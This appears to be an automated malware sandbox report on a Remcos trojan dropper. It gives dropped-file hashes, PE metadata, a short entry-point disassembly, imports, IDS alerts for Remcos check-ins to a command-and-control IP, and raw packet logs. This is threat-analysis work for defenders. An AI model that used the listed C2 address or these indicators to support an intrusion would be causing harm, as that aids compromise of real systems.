C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Fingerstall\Todagesmdet\statshusmands\Genopfrisknings\cadger.bol
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 258250 |
Entropy (8bit): | 1.0353917579133594 |
Encrypted: | false |
SSDEEP: | 768:TrFBTWEMvO9XZDTKtC1F6ahQEpWKhXsGLH4VVgzw8/nPXVccOVF56824gbrbuyco:JMWvfXBnPp65MF |
MD5: | 2992ADE942D72BA9CAF9704896ABC31C |
SHA1: | B0AF5EADEF4E212292007B571BEE2034326B7BF3 |
SHA-256: | 9F7253B41623DC8F4635CC2712FEB9BCB8526256838F5EF088048A9FEA5E2FB6 |
SHA-512: | 8366CF7F264C237F9FCF359EC1D2B1721B9438C6AD54967ECABEB2DCC0F1D02A7C729422F99043CFB83F9B88317C08C4D531D95B43C865183AFBCE7CE0C1E1B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen\tracheloscapular.une
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 878893 |
Entropy (8bit): | 1.0262385306478936 |
Encrypted: | false |
SSDEEP: | 1536:n7sJTz1GINWwKnicuWDZdorbSVFAIpBfeZJG4bJNpGL64nxC:nc1/mnigDZdAmFbv47LpGH |
MD5: | 9B2E36BF826DF2F8DD52FE5CD6660240 |
SHA1: | 10BA7A27ADCAACC08CBFDEC998AB90FC3435A419 |
SHA-256: | CB2106F5D4B252E92425B882E52E1D4AE3A8CF7FBB6E589FF892510E54C2541E |
SHA-512: | 12E792815D5930EE800242553381A7AFCA28B6D18229D8B5AA56AE5BE849685001469345C61498D174F439B8FFAEBDEA18B467EC14067468CE1AD29A374196B8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen\waterish.tat
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 533139 |
Entropy (8bit): | 1.0222842965032446 |
Encrypted: | false |
SSDEEP: | 768:Az/DTHr2KZZhw74n+GN09ZBWHMyFcfWW9/DSeh0SfdeN47xicYDgOvpwWnopqWQh:CJuF9uiVZ5Eh7aY+O |
MD5: | 53C65FB03783103C9CCABCB36593B3D7 |
SHA1: | 23E63DB5B2D2709CB7AF686A86574014B3B8B7F4 |
SHA-256: | 6207761AB226F63B305B155BC2B94D796083B08A74560C4570EBAC81A6F156FB |
SHA-512: | 22A6D1860177CCBF52631A51EE9991951307C439FC04B9380DF9C2AD6F78D1B0683DB393F1C2391C9E49793ACE346116460F4B0C8DFD3400BDD58B90D69AA692 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Preenlarged\confederater.txt
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 409 |
Entropy (8bit): | 4.241897102605509 |
Encrypted: | false |
SSDEEP: | 6:3ogxJohHFKWWRgDNtOA7V+JWTdPM4GtqmyFFzwAaJSNwSdM33u0UX5CGTurhWP:3YHWRc8Y+JJJFynzwAanqS3ulgwIw |
MD5: | 4A7E7B2883FE94C82222A7530E346283 |
SHA1: | 266C2D8A64757575DBD91E73838F133EFF1BF08F |
SHA-256: | C5FDE5EB583497787645D7CA6A2414DA778625ED7EDB0CE6A11B999A231C77CD |
SHA-512: | 4839F5C86CB820EEED6B0C933593E6B72D01273DABC20AA449E9FA87453BFA37B3C3A45350ABDD0223303ED600649DCA8F0DD547F3D4DDEB218FD93B18019430 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 321311 |
Entropy (8bit): | 1.0233765320687445 |
Encrypted: | false |
SSDEEP: | 768:AqxTt4EYevkKSa6EC3IhYMR/WPQztmMkIaDORVF/RNtrNYDgAuYljlXIs0QaDptH:5TKiAR4h7UnZEt/Gj |
MD5: | 4B30B86789FC8932D182149A199D9BC1 |
SHA1: | D90C77DEA11DBC2ADAC65D7A87F6CA1B983D61AB |
SHA-256: | 407069DE71FF4ED64F6FD439B05006DF0BEEFB2319DD60A0F6153E43624B6E92 |
SHA-512: | 9D4ABF86FB0B49957222F753F5BC9187F274139869160EE1AE727660BFA7D123BAC90B55DCF202C57296C45678B7D2624D7C7E2B55F2906B651407933E3BF00A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Preenlarged\navlebeskuelsernes.kmp
Download File
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 551948 |
Entropy (8bit): | 1.0286815545166208 |
Encrypted: | false |
SSDEEP: | 1536:h09qwe082ZMUG0s7uFiAPD7238OB+8Ecw:WeJ2ZMd+iuD7201H |
MD5: | 6CCC9572762C10008D4CFB1ABA6211AA |
SHA1: | 708EA4B5877600007BE8FA049FECC5B90D3FDAC3 |
SHA-256: | C54346CF9A7548A41EB2FBCC77AF1EB290215AB1DC7E26FFDF2780FE222488F1 |
SHA-512: | 742FC884DBE2BCBE22430D5701FC2CE3E71E0234A77E6866776679AF4D6E67FA3B805C5E9E8BDF7C5A28A78A1818510AEE6CE8B5DA370EF57345D78EA67FB9FC |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 302277 |
Entropy (8bit): | 7.756295606803699 |
Encrypted: | false |
SSDEEP: | 6144:9n2Mxt+goD2XWyvX1abHe8zGYD1OKs5Gogrdo5fX+mxKXiPTwWu:9nBkDz2Faje8zG4UGhpoZq |
MD5: | 3A62F30A51FEA9390CD360B7F581C4B3 |
SHA1: | AFDB9CD054C757B7F65DC150ED2DBBF061F8FAB2 |
SHA-256: | F990B58058CCB0CDF3F0F64C78C24B8F41F5228F90C823369E49DECBDC791F05 |
SHA-512: | B25F81BC7C9C8E43027DFF70C9D8CE5CC4C1A803ABFC3C193AB80D638E5BBD22E6BB382266BCC69872185EA7EBE6BEDC05125D04B7B7420B98E931E6D3AD098B |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Windows Mail\wab.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 216 |
Entropy (8bit): | 3.374857612598728 |
Encrypted: | false |
SSDEEP: | 3:rhlKl+hNANf2ql55JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:6l++uql55YcIeeDAlOWAAe5q1gWAv |
MD5: | 89F039849BF8CA10D261A1B942D0DDC4 |
SHA1: | 3D79EF83845941767CF859D26BF965E2D6709122 |
SHA-256: | 3ADABE943E0A8FF8B37A8A560EF4ACAFCEC3EBAEB468DCB1DA163C73806F10FF |
SHA-512: | BF8FBF64A4E3BEEE892A025EF6291875FC64FCD1D8D9649C67C71E1FA12E750EAA3728E518CBB689B2FE64833A233D691EFEAAC31F3B866B8474B87A45F5A5C1 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 40 |
Entropy (8bit): | 4.074024420865021 |
Encrypted: | false |
SSDEEP: | 3:knojCAXWYAE7nv:kTyWYA4v |
MD5: | 39F03323CB7E29E5D4D59DC0151C9AEF |
SHA1: | FD9516A07A3723883DF03F4BFD3EA23AABDFDA06 |
SHA-256: | ACF5D99327A91685A0855662BA92AB905705D6841AD4BAB7E905ED212CAAAF82 |
SHA-512: | EC100B7EE45532A9FD317EDB3AEDDFFDEC2A444A870939BB075CC37C211B8DEDEE9D3849333F657071D858BB744AF24BAB5D8F277CB1108CFC3C6E8C3E9E1CE7 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File Type: | |
Category: | dropped |
Size (bytes): | 36 |
Entropy (8bit): | 4.2527152789797045 |
Encrypted: | false |
SSDEEP: | 3:kEkqNvNH5:O8NZ |
MD5: | 5CB4CE47ECAE0ECC6F75BDA1182E14AC |
SHA1: | 8DA925B20203775B1AF563DDD967F57D5858FC08 |
SHA-256: | 9B56E6F05748A05CAA4BBE992653C8369848F07D3187C882EBF2A3CD79AB323F |
SHA-512: | BE44B3FB9417EB22E620B5B6D844531ECA35BFF6D59C2D378E41A2DAF74CEB8FC74AB14A413205135C103C13A4E2E2B0B3CFCFA561E93DA1A9CDD7B285683EDF |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.94282767415248 |
TrID: |
|
File name: | #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe |
File size: | 1'011'136 bytes |
MD5: | 189590b2755ed6f134d8fe2c05124926 |
SHA1: | e492eb975348e50a32c792d26441cc00912987e7 |
SHA256: | 8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27 |
SHA512: | bf1280546ff4dacddd1b5d08a3a447bb8ccbe2e7c974654e43a266507d6c82080b6f802e4e96ef9f6c5dc0dbc43df64782d66d99e134797971427e88c32219fb |
SSDEEP: | 24576:gIqqULDjF7yCOrJHFTuvMJbmhQU/YydIE5Lt6:9sxANuvMxmhB/Yly6 |
TLSH: | 4625231C29D6C4AAF2018375A37BFB170DC9990751432A1B3BB1B6369F26743DA9F1C8 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................d...........2............@ |
Icon Hash: | 3298cc6662ccd83a |
Entrypoint: | 0x4032a0 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x5795639D [Mon Jul 25 00:55:57 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e2a592076b17ef8bfb48b7e03965a3fc |
Signature Valid: | false |
Signature Issuer: | E=Eucryphiaceae@Nonnocturnal.Ri, O=Vandfoged, OU="Trdningerne Provisorier ", CN=Vandfoged, L=Labouheyre, S=Nouvelle-Aquitaine, C=FR |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 1C12A3114FAC723E69E5026CB661940A |
Thumbprint SHA-1: | A0DF467AD484E19D6E8E507B4F574FD3336A4EBE |
Thumbprint SHA-256: | 748A604870FA6139AE440A26CBC13DBD74AA8ED2DE7F4468C378A8D4814CA2ED |
Serial: | 6544FA7A242778F09A7EE2629CB75B7C51537DFA |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 0040A2E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004080B0h] |
call dword ptr [004080ACh] |
cmp ax, 00000006h |
je 00007F0DA4627F13h |
push ebx |
call 00007F0DA462B054h |
cmp eax, ebx |
je 00007F0DA4627F09h |
push 00000C00h |
call eax |
mov esi, 004082B8h |
push esi |
call 00007F0DA462AFCEh |
push esi |
call dword ptr [0040815Ch] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F0DA4627EECh |
push ebp |
push 00000009h |
call 00007F0DA462B026h |
push 00000007h |
call 00007F0DA462B01Fh |
mov dword ptr [00434EE4h], eax |
call dword ptr [0040803Ch] |
push ebx |
call dword ptr [004082A4h] |
mov dword ptr [00434F98h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 0042B208h |
call dword ptr [00408188h] |
push 0040A2C8h |
push 00433EE0h |
call 00007F0DA462AC08h |
call dword ptr [004080A8h] |
mov ebp, 0043F000h |
push eax |
push ebp |
call 00007F0DA462ABF6h |
push ebx |
call dword ptr [00408174h] |
add word ptr [eax], 0000h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0x13a30 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf5530 | 0x1890 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x637b | 0x6400 | 4219bc0ba21196c40804cc23644c3170 | False | 0.671484375 | data | 6.484635885032963 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x8000 | 0x14b0 | 0x1600 | d6b0bc2db2de2a3dd996fda6539cef0e | False | 0.4401633522727273 | data | 5.033673390997287 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xa000 | 0x2afd8 | 0x600 | 2aa587c909999ca52be17d0f1ffbd186 | False | 0.5188802083333334 | data | 4.039551377217298 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x35000 | 0x2e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x63000 | 0x13a30 | 0x13c00 | 044a0f269a346552eace351ddf330228 | False | 0.5672715585443038 | data | 6.525390268069408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x63358 | 0x8592 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004094285547172 |
RT_ICON | 0x6b8f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.21120689655172414 |
RT_ICON | 0x6fb18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.25975103734439836 |
RT_ICON | 0x720c0 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | English | United States | 0.2865384615384615 |
RT_ICON | 0x73b28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.33724202626641653 |
RT_ICON | 0x74bd0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.43155737704918035 |
RT_ICON | 0x75558 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | English | United States | 0.4924418604651163 |
RT_ICON | 0x75c10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5460992907801419 |
RT_DIALOG | 0x76078 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x76178 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x76298 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x76360 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x763c0 | 0x76 | data | English | United States | 0.7542372881355932 |
RT_VERSION | 0x76438 | 0x2b8 | COM executable for DOS | English | United States | 0.46695402298850575 |
RT_MANIFEST | 0x766f0 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153 |
DLL | Import |
---|---|
KERNEL32.dll | SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW |
USER32.dll | GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/24/24-07:13:18.722858 | TCP | 2032776 | ET TROJAN Remcos 3.x Unencrypted Checkin | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
04/24/24-07:15:39.581439 | TCP | 2032777 | ET TROJAN Remcos 3.x Unencrypted Server Response | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 24, 2024 07:13:12.407933950 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.407973051 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:12.408032894 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.436760902 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.436780930 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:12.782246113 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:12.782413006 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.831691980 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.831720114 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:12.832748890 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:12.832832098 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.836309910 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:12.880117893 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144215107 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144382954 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144494057 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.144527912 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144685030 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144737005 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.144747019 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144845009 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.144891024 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.144897938 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.145013094 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.145029068 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.145036936 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.145066977 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.145117044 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.145123005 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.145248890 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.145303011 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.145309925 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.146018028 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.146070004 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.146075010 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.146229029 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.146277905 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.146285057 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.146970987 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.147022009 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.147028923 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.147651911 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.147695065 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.147703886 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.147928953 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.147983074 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.147991896 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.148627043 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.148670912 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.148677111 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.148858070 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.148905993 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.148915052 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.149022102 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.149028063 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.149070978 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.149391890 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.149558067 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.149604082 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.149617910 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.150351048 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.150396109 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.150403023 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.150517941 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.150559902 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.150568008 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.151338100 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.151386023 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.151393890 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.151479959 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.151523113 CEST | 49712 | 443 | 192.168.2.9 | 104.21.60.38 |
Apr 24, 2024 07:13:13.151530981 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
Apr 24, 2024 07:13:13.152416945 CEST | 443 | 49712 | 104.21.60.38 | 192.168.2.9 |
